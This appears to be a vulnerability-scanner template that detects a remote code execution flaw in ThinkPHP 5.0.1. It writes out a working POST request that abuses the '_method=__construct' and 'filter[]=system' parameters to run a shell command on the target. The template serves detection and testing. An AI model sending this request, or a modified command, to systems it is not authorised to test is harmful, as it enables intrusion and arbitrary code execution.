id: thinkphp-501-rce info: name: ThinkPHP 5.0.1 - Remote Code Execution author: lark-lab severity: critical description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to execute arbitrary code via the 's' parameter. reference: - https://www.exploit-db.com/exploits/46150 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: edb,thinkphp,rce requests: - method: POST path: - "{{BaseURL}}/?s=index/index/index" body: "s=echo%20thinkphp%20%7C%20rev&_method=__construct&method&filter[]=system" headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word part: body words: - "phpkniht" - type: status status: - 200 # Enhanced by mp on 2022/05/31